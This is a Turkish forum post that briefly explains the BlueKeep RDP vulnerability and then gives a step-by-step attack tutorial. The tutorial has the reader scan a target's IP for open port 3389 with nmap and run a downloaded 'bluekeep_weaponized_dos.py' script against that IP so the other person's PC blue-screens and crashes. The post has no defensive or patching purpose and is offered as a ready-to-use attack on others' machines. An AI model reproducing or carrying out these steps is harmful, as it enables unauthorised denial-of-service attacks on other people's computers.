İPUCU

Bilgisayar Güvenliği Bilgisayar Güvenlik Sistemleri makaleleri, virüs korumasından, güvenlik duvarlarına kadar her şeyin nasıl çalıştığı hakkında bilgilere buradan ulaşabilirsiniz.

Seçenekler

BlueKeep Uzak Masaüstü Kod Yürütme

bir Hafta önce
#1
Üyelik tarihi:
02/2019
Nereden:
Türkiye
Yaş:
25
Mesajlar:
413
Teşekkür (Etti):
44
Teşekkür (Aldı):
109
Konular:
112
Ticaret:
(0) %
BlueKeep



Kimliği doğrulanmamış bir saldırgan RDP kullanarak hedef sisteme bağlandığında ve özel hazırlanmış istekler gönderdiğinde, eskiden Terminal Hizmetleri olarak bilinen Uzak Masaüstü Hizmetlerinde bir uzaktan kod yürütme güvenlik açığı bulunmaktadır. Bu güvenlik açığı ön kimlik doğrulamasıdır ve kullanıcı etkileşimi gerektirmez. Bu güvenlik açığından başarıyla yararlanan bir saldırgan, hedef sistemde rasgele kod yürütebilir. Bir saldırgan daha sonra programlar yükleyebilir; veri görüntüleme, değiştirme veya silme; veya tam kullanıcı haklarına sahip yeni hesaplar oluşturun.

Bu güvenlik açığından yararlanmak için, saldırganın RDP üzerinden Uzak Masaüstü Hizmeti hedef sistemlerine özel hazırlanmış bir istek göndermesi gerekir.




oncelıkle bunları kutuphanemıze eklıyoruz


oncelıkle gereklı olan dosyayı ındırın






yukledikten sonra cmd komut istemcisine


oncelıkle 3389 portunun acık olup olmadıgına bakıyoruz


Kod:
nmap KARSI PC İP YAZIYORUZ -p 3389

ardından enter tusuna basıyoruz


3389 / tcp open yazıyorsa karsı pc savunmasız demektır



ardından aracı calıstırmaya geldı


Kod:
cd desktop/
yazarak masaustu dızınıne gidiyoruz

ardından hangı githup dan verdigim py dosyasını ındırdıysenız onu calıstırıyorsunuz


örnek olarak ben bunu ındırdım


çalıstırmak ıcın ise


Kod:
python bluekeep_weaponized_dos.py 192.168xx (karsı ıp ) 32 bit veya 64 bit hangisi ise onu yazın
örnek python bluekeep_weaponized_dos.py 192.168.1.145 64

yazıp entere basıyoruz ve calısıtıgı an karsı pc mavı ekran verıp çökuyor


ve işlem bu kadar arkadaslar umarım faydalı olmustur

anlamayanlar ıcın video



Kullanıcı İmzası
Taktir Ediliyorsan Degil, Taklit Ediliyorsan Başarmıssın Demektir
Konu AhmetKaan46 tarafından (bir Hafta önce Saat 16:38 ) değiştirilmiştir.
DarkScannel Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı